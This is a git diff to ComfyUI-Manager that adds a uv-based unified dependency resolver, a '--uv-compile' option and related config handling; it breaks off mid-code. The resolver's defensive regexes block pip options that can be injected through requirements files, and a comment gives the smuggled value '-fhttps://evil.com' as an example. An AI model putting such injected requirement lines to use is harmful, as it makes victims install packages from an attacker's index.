diff --git a/.gitignore b/.gitignore
index f00db96b..e7c41bd8 100644
--- a/.gitignore
+++ b/.gitignore
@@ -21,4 +21,6 @@ check2.sh
build
dist
*.egg-info
-.env
\ No newline at end of file
+.env
+.claude
+test_venv
diff --git a/cm_cli/__main__.py b/cm_cli/__main__.py
index 36120174..9d6e9984 100644
--- a/cm_cli/__main__.py
+++ b/cm_cli/__main__.py
@@ -656,6 +656,14 @@ def install(
help="Skip installing any Python dependencies",
),
] = False,
+ uv_compile: Annotated[
+ Optional[bool],
+ typer.Option(
+ "--uv-compile",
+ show_default=False,
+ help="After installing, batch-resolve all dependencies via uv pip compile",
+ ),
+ ] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@@ -667,11 +675,34 @@ def install(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
- cmd_ctx.set_no_deps(no_deps)
+
+ if uv_compile and no_deps:
+ print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
+ raise typer.Exit(1)
+
+ if uv_compile:
+ cmd_ctx.set_no_deps(True)
+ else:
+ cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=install_node, exit_on_fail=exit_on_fail)
- pip_fixer.fix_broken()
+
+ if uv_compile:
+ try:
+ _run_unified_resolve()
+ except ImportError as e:
+ print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
+ raise typer.Exit(1)
+ except typer.Exit:
+ raise
+ except Exception as e:
+ print(f"[bold red]Batch resolution failed: {e}[/bold red]")
+ raise typer.Exit(1)
+ finally:
+ pip_fixer.fix_broken()
+ else:
+ pip_fixer.fix_broken()
@app.command(help="Reinstall custom nodes")
@@ -1223,6 +1254,77 @@ def install_deps(
print("Dependency installation and activation complete.")
+def _run_unified_resolve():
+ """Shared logic for unified batch dependency resolution."""
+ from comfyui_manager.common.unified_dep_resolver import (
+ UnifiedDepResolver,
+ UvNotAvailableError,
+ collect_base_requirements,
+ collect_node_pack_paths,
+ )
+
+ node_pack_paths = collect_node_pack_paths(cmd_ctx.get_custom_nodes_paths())
+ if not node_pack_paths:
+ print("[bold yellow]No custom node packs found.[/bold yellow]")
+ return
+
+ print(f"Resolving dependencies for {len(node_pack_paths)} node pack(s)...")
+
+ resolver = UnifiedDepResolver(
+ node_pack_paths=node_pack_paths,
+ base_requirements=collect_base_requirements(comfy_path),
+ blacklist=cm_global.pip_blacklist,
+ overrides=cm_global.pip_overrides,
+ downgrade_blacklist=cm_global.pip_downgrade_blacklist,
+ )
+ try:
+ result = resolver.resolve_and_install()
+ except UvNotAvailableError:
+ print("[bold red]uv is not available. Install uv to use this feature.[/bold red]")
+ raise typer.Exit(1)
+
+ if result.success:
+ collected = result.collected
+ if collected:
+ print(
+ f"[bold green]Resolved {len(collected.requirements)} deps "
+ f"from {len(collected.sources)} source(s) "
+ f"(skipped {len(collected.skipped)}).[/bold green]"
+ )
+ else:
+ print("[bold green]Resolution complete (no deps needed).[/bold green]")
+ else:
+ print(f"[bold red]Resolution failed: {result.error}[/bold red]")
+ raise typer.Exit(1)
+
+
+@app.command(
+ "uv-compile",
+ help="Batch-resolve and install all custom node dependencies via uv pip compile.",
+)
+def unified_uv_compile(
+ user_directory: str = typer.Option(
+ None,
+ help="user directory"
+ ),
+):
+ cmd_ctx.set_user_directory(user_directory)
+
+ pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
+ try:
+ _run_unified_resolve()
+ except ImportError as e:
+ print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
+ raise typer.Exit(1)
+ except typer.Exit:
+ raise
+ except Exception as e:
+ print(f"[bold red]Unexpected error: {e}[/bold red]")
+ raise typer.Exit(1)
+ finally:
+ pip_fixer.fix_broken()
+
+
@app.command(help="Clear reserved startup action in ComfyUI-Manager")
def clear():
cancel()
diff --git a/comfyui_manager/common/manager_util.py b/comfyui_manager/common/manager_util.py
index 5a798043..84b88810 100644
--- a/comfyui_manager/common/manager_util.py
+++ b/comfyui_manager/common/manager_util.py
@@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
use_uv = False
+use_unified_resolver = False
bypass_ssl = False
def is_manager_pip_package():
diff --git a/comfyui_manager/common/unified_dep_resolver.py b/comfyui_manager/common/unified_dep_resolver.py
new file mode 100644
index 00000000..fc5c0e35
--- /dev/null
+++ b/comfyui_manager/common/unified_dep_resolver.py
@@ -0,0 +1,703 @@
+"""Unified Dependency Resolver for ComfyUI Manager.
+
+Resolves and installs all node-pack dependencies at once using ``uv pip compile``
+followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
+
+Responsibility scope
+--------------------
+- Dependency collection, resolution, and installation **only**.
+- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
+
+See Also
+--------
+- docs/dev/PRD-unified-dependency-resolver.md
+- docs/dev/DESIGN-unified-dependency-resolver.md
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import re
+import shutil
+import subprocess
+import sys
+import tempfile
+import time
+from collections import defaultdict
+from dataclasses import dataclass, field
+
+from . import manager_util
+
+logger = logging.getLogger("ComfyUI-Manager")
+
+# ---------------------------------------------------------------------------
+# Exceptions
+# ---------------------------------------------------------------------------
+
+class UvNotAvailableError(RuntimeError):
+ """Raised when neither ``python -m uv`` nor standalone ``uv`` is found."""
+
+
+# ---------------------------------------------------------------------------
+# Data classes
+# ---------------------------------------------------------------------------
+
+@dataclass
+class PackageRequirement:
+ """Individual package dependency."""
+ name: str # Normalised package name
+ spec: str # Original spec string (e.g. ``torch>=2.0``)
+ source: str # Absolute path of the source node pack
+
+
+@dataclass
+class CollectedDeps:
+ """Aggregated dependency collection result."""
+ requirements: list[PackageRequirement] = field(default_factory=list)
+ skipped: list[tuple[str, str]] = field(default_factory=list)
+ sources: dict[str, list[str]] = field(default_factory=dict)
+ extra_index_urls: list[str] = field(default_factory=list)
+
+
+@dataclass
+class LockfileResult:
+ """Result of ``uv pip compile``."""
+ success: bool
+ lockfile_path: str | None = None
+ conflicts: list[str] = field(default_factory=list)
+ stderr: str = ""
+
+
+@dataclass
+class InstallResult:
+ """Result of ``uv pip install -r`` (atomic: all-or-nothing)."""
+ success: bool
+ installed: list[str] = field(default_factory=list)
+ skipped: list[str] = field(default_factory=list)
+ stderr: str = ""
+
+
+@dataclass
+class ResolveResult:
+ """Full pipeline result."""
+ success: bool
+ collected: CollectedDeps | None = None
+ lockfile: LockfileResult | None = None
+ install: InstallResult | None = None
+ error: str | None = None
+
+
+# ---------------------------------------------------------------------------
+# Resolver
+# ---------------------------------------------------------------------------
+
+_TMP_PREFIX = "comfyui_resolver_"
+
+# Security: reject dangerous requirement patterns at line start.
+# NOTE: This regex is intentionally kept alongside _INLINE_DANGEROUS_OPTIONS
+# because it covers ``@ file://`` via ``.*@\s*file://`` which relies on the
+# ``^`` anchor. Both regexes share responsibility for option rejection:
+# this one catches line-start patterns; _INLINE_DANGEROUS_OPTIONS catches
+# options appearing after a package name.
+_DANGEROUS_PATTERNS = re.compile(
+ r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
+ r'|--find-links\b|-f\b|.*@\s*file://)',
+ re.IGNORECASE,
+)
+
+# Security: reject dangerous pip options appearing anywhere in the line
+# (supplements the ^-anchored _DANGEROUS_PATTERNS which only catches line-start).
+# The ``(?:^|\s)`` prefix prevents false positives on hyphenated package names
+# (e.g. ``re-crypto``, ``package[extra-c]``) while still catching concatenated
+# short-flag attacks like ``-fhttps://evil.com``.
+_INLINE_DANGEROUS_OPTIONS = re.compile(
+ r'(?:^|\s)(--find-links\b|--constraint\b|--requirement\b|--editable\b'
+ r'|--trusted-host\b|--global-option\b|--install-option\b'
+ r'|-f|-r|-e|-c)',
+ re.IGNORECASE,
+)
+
+# Credential redaction in index URLs.
+_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
+
+# Version-spec parsing (same regex as existing ``is_blacklisted()``).
+_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
+
+
+
+def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
+ """Collect all installed node-pack directory paths.
+
+ Parameters
+ ----------
+ custom_nodes_dirs:
+ Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.
+
+ Returns
+ -------
+ list[str]
+ Paths of node-pack directories (immediate subdirectories of each base).
+ """
+ paths: list[str] = []
+ for base in custom_nodes_dirs:
+ if os.path.isdir(base):
+ for name in os.listdir(base):
+ fullpath = os.path.join(base, name)
+ if os.path.isdir(fullpath):
+ paths.append(fullpath)
+ return paths
+
+
+def collect_base_requirements(comfy_path: str) -> list[str]:
+ """Read ComfyUI's own base requirements as constraint lines.
+
+ Reads ``requirements.txt`` and ``manager_requirements.txt`` from *comfy_path*.
+ These are ComfyUI-level dependencies only — never read from node packs.
+
+ Parameters
+ ----------
+ comfy_path:
+ Root directory of the ComfyUI installation.
+
+ Returns
+ -------
+ list[str]
+ Non-empty, non-comment requirement lines.
+ """
+ reqs: list[str] = []
+ for filename in ("requirements.txt", "manager_requirements.txt"):
+ req_path = os.path.join(comfy_path, filename)
+ if os.path.exists(req_path):
+ with open(req_path, encoding="utf-8") as f:
+ reqs.extend(
+ line.strip() for line in f
+ if line.strip() and not line.strip().startswith('#')
+ )
+ return reqs
+
+
+class UnifiedDepResolver:
+ """Unified dependency resolver.
+
+ Resolves and installs all dependencies of (installed + new) node packs at
+ once using *uv*.
+
+ Parameters
+ ----------
+ node_pack_paths:
+ Absolute paths of node-pack directories to consider.
+ base_requirements:
+ Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
+ blacklist:
+ Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
+ overrides:
+ Package-name remapping dict (default: ``cm_global.pip_overrides``).
+ downgrade_blacklist:
+ Packages whose installed versions must not be downgraded
+ (default: ``cm_global.pip_downgrade_blacklist``).
+ """
+
+ def __init__(
+ self,
+ node_pack_paths: list[str],
+ base_requirements: list[str] | None = None,
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+ ) -> None:
+ self.node_pack_paths = node_pack_paths
+ self.base_requirements = base_requirements or []
+ self.blacklist: set[str] = blacklist if blacklist is not None else set()
+ self.overrides: dict[str, str] = overrides if overrides is not None else {}
+ self.downgrade_blacklist: list[str] = (
+ downgrade_blacklist if downgrade_blacklist is not None else []
+ )
+
+ # ------------------------------------------------------------------
+ # Public API
+ # ------------------------------------------------------------------
+
+ def resolve_and_install(self) -> ResolveResult:
+ """Execute the full pipeline: cleanup → collect → compile → install."""
+ self.cleanup_stale_tmp()
+
+ tmp_dir: str | None = None
+ try:
+ # 1. Collect
+ collected = self.collect_requirements()
+ if not collected.requirements:
+ logger.info("[UnifiedDepResolver] No dependencies to resolve")
+ return ResolveResult(success=True, collected=collected)
+
+ logger.info(
+ "[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
+ len(collected.requirements),
+ len(collected.sources),
+ len(collected.skipped),
+ )
+
+ # 2. Compile
+ lockfile = self.compile_lockfile(collected)
+ if not lockfile.success:
+ return ResolveResult(
+ success=False,
+ collected=collected,
+ lockfile=lockfile,
+ error=f"compile failed: {'; '.join(lockfile.conflicts)}",
+ )
+ # tmp_dir is the parent of lockfile_path
+ tmp_dir = os.path.dirname(lockfile.lockfile_path) # type: ignore[arg-type]
+
+ # 3. Install
+ install = self.install_from_lockfile(lockfile.lockfile_path) # type: ignore[arg-type]
+ return ResolveResult(
+ success=install.success,
+ collected=collected,
+ lockfile=lockfile,
+ install=install,
+ error=install.stderr if not install.success else None,
+ )
+ except UvNotAvailableError:
+ raise
+ except Exception as exc:
+ logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
+ return ResolveResult(success=False, error=str(exc))
+ finally:
+ if tmp_dir and os.path.isdir(tmp_dir):
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+
+ # ------------------------------------------------------------------
+ # Step 1: collect
+ # ------------------------------------------------------------------
+
+ def collect_requirements(self) -> CollectedDeps:
+ """Collect dependencies from all node packs."""
+ requirements: list[PackageRequirement] = []
+ skipped: list[tuple[str, str]] = []
+ sources: dict[str, list[str]] = defaultdict(list)
+ extra_index_urls: list[str] = []
+
+ # Snapshot installed packages once to avoid repeated subprocess calls.
+ # Skip when downgrade_blacklist is empty (the common default).
+ installed_snapshot = (
+ manager_util.get_installed_packages()
+ if self.downgrade_blacklist else {}
+ )
+
+ for pack_path in self.node_pack_paths:
+ # Exclude disabled node packs (directory-based mechanism).
+ if self._is_disabled_path(pack_path):
+ continue
+
+ req_file = os.path.join(pack_path, "requirements.txt")
+ if not os.path.exists(req_file):
+ continue
+
+ for raw_line in self._read_requirements(req_file):
+ line = raw_line.split('#')[0].strip()
+ if not line:
+ continue
+
+ # 0. Security: reject dangerous patterns
+ if _DANGEROUS_PATTERNS.match(line):
+ skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # 1. Separate --index-url / --extra-index-url handling
+ # (before path separator check, because URLs contain '/')
+ # URLs are staged but NOT committed until the line passes
+ # all validation (prevents URL injection from rejected lines).
+ pending_urls: list[str] = []
+ if '--index-url' in line or '--extra-index-url' in line:
+ pkg_spec, pending_urls = self._split_index_url(line)
+ line = pkg_spec
+ if not line:
+ # Standalone option line (no package prefix) — safe
+ extra_index_urls.extend(pending_urls)
+ continue
+
+ # 1b. Reject dangerous pip options appearing after package name
+ # (--index-url/--extra-index-url already extracted above)
+ if _INLINE_DANGEROUS_OPTIONS.search(line):
+ skipped.append((line, f"rejected: inline pip option in {pack_path}"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected inline pip option: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # Reject path separators in package name portion
+ pkg_name_part = re.split(r'[><=!~;]', line)[0]
+ if '/' in pkg_name_part or '\\' in pkg_name_part:
+ skipped.append((line, "rejected: path separator in package name"))
+ logger.warning(
+ "[UnifiedDepResolver] rejected path separator: '%s' from %s",
+ line, pack_path,
+ )
+ continue
+
+ # 2. Remap package name
+ pkg_spec = self._remap_package(line)
+
+ # 3. Extract normalised name
+ pkg_name = self._extract_package_name(pkg_spec)
+
+ # 4. Blacklist check
+ if pkg_name in self.blacklist:
+ skipped.append((pkg_spec, "blacklisted"))
+ continue
+
+ # 5. Downgrade blacklist check
+ if self._is_downgrade_blacklisted(pkg_name, pkg_spec,
+ installed_snapshot):
+ skipped.append((pkg_spec, "downgrade blacklisted"))
+ continue
+
+ # 6. Collect (no dedup — uv handles resolution)
+ requirements.append(
+ PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
+ )
+ sources[pkg_name].append(pack_path)
+
+ # Commit staged index URLs only after all validation passed.
+ if pending_urls:
+ extra_index_urls.extend(pending_urls)
+
+ return CollectedDeps(
+ requirements=requirements,
+ skipped=skipped,
+ sources=dict(sources),
+            extra_index_urls=list(dict.fromkeys(extra_index_urls)),
+ )
+
+ # ------------------------------------------------------------------
+ # Step 2: compile
+ # ------------------------------------------------------------------
+
+ def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
+ """Generate pinned requirements via ``uv pip compile``."""
+ tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)
+
+ try:
+ # Write temp requirements
+ tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
+ with open(tmp_req, "w", encoding="utf-8") as fh:
+ for req in deps.requirements:
+ fh.write(req.spec + "\n")
+
+ # Write constraints (base dependencies)
+ tmp_constraints: str | None = None
+ if self.base_requirements:
+ tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
+ with open(tmp_constraints, "w", encoding="utf-8") as fh:
+ for line in self.base_requirements:
+ fh.write(line.strip() + "\n")
+
+ lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")
+
+ cmd = self._get_uv_cmd() + [
+ "pip", "compile",
+ tmp_req,
+ "--output-file", lockfile_path,
+ "--python", sys.executable,
+ ]
+ if tmp_constraints:
+ cmd += ["--constraint", tmp_constraints]
+
+ for url in deps.extra_index_urls:
+ logger.info(
+ "[UnifiedDepResolver] extra-index-url: %s",
+ self._redact_url(url),
+ )
+ cmd += ["--extra-index-url", url]
+
+ logger.info("[UnifiedDepResolver] running: %s", " ".join(
+ self._redact_url(c) for c in cmd
+ ))
+
+ try:
+ result = subprocess.run(
+ cmd,
+ capture_output=True,
+ text=True,
+ timeout=300,
+ )
+ except subprocess.TimeoutExpired:
+ logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
+ return LockfileResult(
+ success=False,
+ conflicts=["compile timeout exceeded (300s)"],
+ stderr="TimeoutExpired",
+ )
+
+ if result.returncode != 0:
+ conflicts = self._parse_conflicts(result.stderr)
+ return LockfileResult(
+ success=False,
+ conflicts=conflicts,
+ stderr=result.stderr,
+ )
+
+ if not os.path.exists(lockfile_path):
+ return LockfileResult(
+ success=False,
+ conflicts=["lockfile not created despite success return code"],
+ stderr=result.stderr,
+ )
+
+ return LockfileResult(success=True, lockfile_path=lockfile_path)
+
+ except UvNotAvailableError:
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+ raise
+ except Exception:
+ shutil.rmtree(tmp_dir, ignore_errors=True)
+ raise
+
+ # ------------------------------------------------------------------
+ # Step 3: install
+ # ------------------------------------------------------------------
+
+ def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
+ """Install from pinned requirements (``uv pip install -r``).
+
+ Do **not** use ``uv pip sync`` — it deletes packages not in the
+ lockfile, risking removal of torch, ComfyUI deps, etc.
+ """
+ cmd = self._get_uv_cmd() + [
+ "pip", "install",
+ "--requirement", lockfile_path,
+ "--python", sys.executable,
+ ]
+
+ logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))
+
+ try:
+ result = subprocess.run(
+ cmd,
+ capture_output=True,
+ text=True,
+ timeout=600,
+ )
+ except subprocess.TimeoutExpired:
+ logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
+ return InstallResult(
+ success=False,
+ stderr="TimeoutExpired: install exceeded 600s",
+ )
+
+ installed, skipped_pkgs = self._parse_install_output(result)
+
+ return InstallResult(
+ success=result.returncode == 0,
+ installed=installed,
+ skipped=skipped_pkgs,
+ stderr=result.stderr if result.returncode != 0 else "",
+ )
+
+ # ------------------------------------------------------------------
+ # uv command resolution
+ # ------------------------------------------------------------------
+
+ def _get_uv_cmd(self) -> list[str]:
+ """Determine the ``uv`` command to use.
+
+ ``python_embeded`` spelling is intentional — matches the actual path
+ name in the ComfyUI Windows distribution.
+ """
+ embedded = 'python_embeded' in sys.executable
+
+ # 1. Try uv as a Python module
+ try:
+ test_cmd = (
+ [sys.executable]
+ + (['-s'] if embedded else [])
+ + ['-m', 'uv', '--version']
+ )
+ subprocess.check_output(test_cmd, stderr=subprocess.DEVNULL, timeout=5)
+ return [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
+ except Exception:
+ pass
+
+ # 2. Standalone uv executable
+ if shutil.which('uv'):
+ return ['uv']
+
+ raise UvNotAvailableError("uv is not available")
+
+ # ------------------------------------------------------------------
+ # Helpers — collection
+ # ------------------------------------------------------------------
+
+ @staticmethod
+ def _is_disabled_path(path: str) -> bool:
+ """Return ``True`` if *path* is within a ``.disabled`` directory."""
+ # New style: custom_nodes/.disabled/{name}
+ if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
+ return True
+ # Old style: {name}.disabled suffix
+        if path.rstrip('/\\').endswith('.disabled'):
+ return True
+ return False
+
+ @staticmethod
+ def _read_requirements(filepath: str) -> list[str]:
+ """Read requirements file using ``robust_readlines`` pattern."""
+ return manager_util.robust_readlines(filepath)
+
+ @staticmethod
+ def _split_index_url(line: str) -> tuple[str, list[str]]:
+ """Split index-url options from a requirement line.
+
+ Handles lines with one or more ``--index-url`` / ``--extra-index-url``
+ options. Returns ``(package_spec, [url, ...])``.
+
+ Examples::
+
+ "torch --extra-index-url U1 --index-url U2"
+ → ("torch", ["U1", "U2"])
+
+ "--index-url URL"
+ → ("", ["URL"])
+ """
+ urls: list[str] = []
+ remainder_tokens: list[str] = []
+
+ # Regex: match --extra-index-url or --index-url followed by its value
+ option_re = re.compile(
+ r'(--(?:extra-)?index-url)\s+(\S+)'
+ )
+
+ # Pattern for bare option flags without a URL value
+ bare_option_re = re.compile(r'^--(?:extra-)?index-url$')
+
+ last_end = 0
+ for m in option_re.finditer(line):
+ # Text before this option is part of the package spec
+ before = line[last_end:m.start()].strip()
+ if before:
+ remainder_tokens.append(before)
+ urls.append(m.group(2))
+ last_end = m.end()
+
+ # Trailing text after last option
+ trailing = line[last_end:].strip()
+ if trailing:
+ remainder_tokens.append(trailing)
+
+ # Strip any bare option flags that leaked into remainder tokens
+ # (e.g. "--index-url" with no URL value after it)
+ remainder_tokens = [
+ t for t in remainder_tokens if not bare_option_re.match(t)
+ ]
+
+ pkg_spec = " ".join(remainder_tokens).strip()
+ return pkg_spec, urls
+
+ def _remap_package(self, pkg: str) -> str:
+ """Apply ``pip_overrides`` remapping."""
+ if pkg in self.overrides:
+ remapped = self.overrides[pkg]
+ logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
+ return remapped
+ return pkg
+
+ @staticmethod
+ def _extract_package_name(spec: str) -> str:
+ """Extract normalised package name from a requirement spec."""
+ name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
+ return name.lower().replace('-', '_')
+
+ def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str,
+ installed: dict) -> bool:
+ """Reproduce the downgrade logic from ``is_blacklisted()``.
+
+ Uses ``manager_util.StrictVersion`` — **not** ``packaging.version``.
+
+ Args:
+ installed: Pre-fetched snapshot from
+ ``manager_util.get_installed_packages()``.
+ """
+ if pkg_name not in self.downgrade_blacklist:
+ return False
+
+ match = _VERSION_SPEC_PATTERN.search(pkg_spec)
+
+ if match is None:
+ # No version spec: prevent reinstall if already installed
+ if pkg_name in installed:
+ return True
+ elif match.group(2) in ('<=', '==', '<', '~='):
+ if pkg_name in installed:
+ try:
+ installed_ver = manager_util.StrictVersion(installed[pkg_name])
+ requested_ver = manager_util.StrictVersion(match.group(3))
+ if installed_ver >= requested_ver:
+ return True
+ except (ValueError, TypeError):
+ logger.warning(
+ "[UnifiedDepResolver] version parse failed: %s", pkg_spec,
+ )
+ return False
+
+ return False
+
+ # ------------------------------------------------------------------
+ # Helpers — parsing & output
+ # ------------------------------------------------------------------
+
+ @staticmethod
+ def _parse_conflicts(stderr: str) -> list[str]:
+ """Extract conflict descriptions from ``uv pip compile`` stderr."""
+ conflicts: list[str] = []
+ for line in stderr.splitlines():
+ line = line.strip()
+ if line and ('conflict' in line.lower() or 'error' in line.lower()):
+ conflicts.append(line)
+        return conflicts or ([stderr.strip()] if stderr.strip() else [])
+
+ @staticmethod
+ def _parse_install_output(
+ result: subprocess.CompletedProcess[str],
+ ) -> tuple[list[str], list[str]]:
+ """Parse ``uv pip install`` stdout for installed/skipped packages."""
+ installed: list[str] = []
+ skipped_pkgs: list[str] = []
+ for line in result.stdout.splitlines():
+ line_lower = line.strip().lower()
+ if 'installed' in line_lower or 'updated' in line_lower:
+ installed.append(line.strip())
+ elif 'already' in line_lower or 'satisfied' in line_lower:
+ skipped_pkgs.append(line.strip())
+ return installed, skipped_pkgs
+
+ @staticmethod
+ def _redact_url(url: str) -> str:
+ """Mask ``user:pass@`` credentials in URLs."""
+ return _CREDENTIAL_PATTERN.sub('://****@', url)
+
+ # ------------------------------------------------------------------
+ # Temp-file housekeeping
+ # ------------------------------------------------------------------
+
+ @classmethod
+ def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
+ """Remove stale temp directories from previous abnormal terminations."""
+ tmp_root = tempfile.gettempdir()
+ now = time.time()
+ for entry in os.scandir(tmp_root):
+ if entry.is_dir() and entry.name.startswith(_TMP_PREFIX):
+ try:
+ age = now - entry.stat().st_mtime
+ if age > max_age_seconds:
+ shutil.rmtree(entry.path, ignore_errors=True)
+ logger.info(
+ "[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
+ )
+ except OSError:
+ pass
diff --git a/comfyui_manager/glob/manager_core.py b/comfyui_manager/glob/manager_core.py
index fc3a549d..1202dd22 100644
--- a/comfyui_manager/glob/manager_core.py
+++ b/comfyui_manager/glob/manager_core.py
@@ -843,7 +843,10 @@ class UnifiedManager:
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
return try_install_script(url, repo_path, install_cmd)
else:
- if os.path.exists(requirements_path) and not no_deps:
+ if not no_deps and manager_util.use_unified_resolver:
+ # Unified mode: skip per-node pip install (deps resolved at startup batch)
+ logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
+ elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
lines = manager_util.robust_readlines(requirements_path)
@@ -1604,6 +1607,7 @@ def write_config():
config['default'] = {
'git_exe': get_config()['git_exe'],
'use_uv': get_config()['use_uv'],
+ 'use_unified_resolver': get_config()['use_unified_resolver'],
'channel_url': get_config()['channel_url'],
'share_option': get_config()['share_option'],
'bypass_ssl': get_config()['bypass_ssl'],
@@ -1642,12 +1646,16 @@ def read_config():
return default_conf[key].lower() == 'true' if key in default_conf else False
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
+ # Don't override use_unified_resolver here: prestartup_script.py already reads config
+ # and sets this flag, then may reset it to False on resolver fallback.
+ # Re-reading from config would undo the fallback.
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
return {
'http_channel_enabled': get_bool('http_channel_enabled', False),
'git_exe': default_conf.get('git_exe', ''),
'use_uv': get_bool('use_uv', True),
+ 'use_unified_resolver': get_bool('use_unified_resolver', False),
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
'share_option': default_conf.get('share_option', 'all').lower(),
@@ -1668,12 +1676,14 @@ def read_config():
import importlib.util
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
+ manager_util.use_unified_resolver = False
manager_util.bypass_ssl = False
return {
'http_channel_enabled': False,
'git_exe': '',
'use_uv': manager_util.use_uv,
+ 'use_unified_resolver': False,
'channel_url': DEFAULT_CHANNEL,
'default_cache_as_channel_url': False,
'share_option': 'all',
@@ -1871,7 +1881,6 @@ def __win_check_git_pull(path):
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
- # import ipdb; ipdb.set_trace()
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
@@ -1879,7 +1888,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
try_install_script(url, repo_path, install_cmd)
else:
- if os.path.exists(requirements_path) and not no_deps:
+ if not no_deps and manager_util.use_unified_resolver:
+ # Unified mode: skip per-node pip install (deps resolved at startup batch)
+ logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
+ elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
with open(requirements_path, "r") as requirements_file:
diff --git a/comfyui_manager/prestartup_script.py b/comfyui_manager/prestartup_script.py
index db90ce4f..121a5194 100644
--- a/comfyui_manager/prestartup_script.py
+++ b/comfyui_manager/prestartup_script.py
@@ -88,6 +88,11 @@ def read_uv_mode():
if 'use_uv' in default_conf:
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
+
+def read_unified_resolver_mode():
+ if 'use_unified_resolver' in default_conf:
+ manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
+
def check_file_logging():
global enable_file_logging
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
@@ -96,9 +101,14 @@ def check_file_logging():
read_config()
read_uv_mode()
+read_unified_resolver_mode()
security_check.security_check()
check_file_logging()
+# Module-level flag set by startup batch resolver when it succeeds.
+# Used by execute_lazy_install_script() to skip per-node pip installs.
+_unified_resolver_succeeded = False
+
cm_global.pip_overrides = {}
if os.path.exists(manager_pip_overrides_path):
@@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
- if os.path.exists(requirements_path):
+ if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
+ # Per-node pip install: only runs if unified resolver is disabled or failed
print(f"Install: pip packages for '{repo_path}'")
lines = manager_util.robust_readlines(requirements_path)
@@ -751,6 +762,38 @@ def execute_startup_script():
print("#######################################################################\n")
+# --- Unified dependency resolver: batch resolution at startup ---
+# Runs unconditionally when enabled, independent of install-scripts.txt existence.
+if manager_util.use_unified_resolver:
+ try:
+ from .common.unified_dep_resolver import (
+ UnifiedDepResolver,
+ UvNotAvailableError,
+ collect_base_requirements,
+ collect_node_pack_paths,
+ )
+
+ _resolver = UnifiedDepResolver(
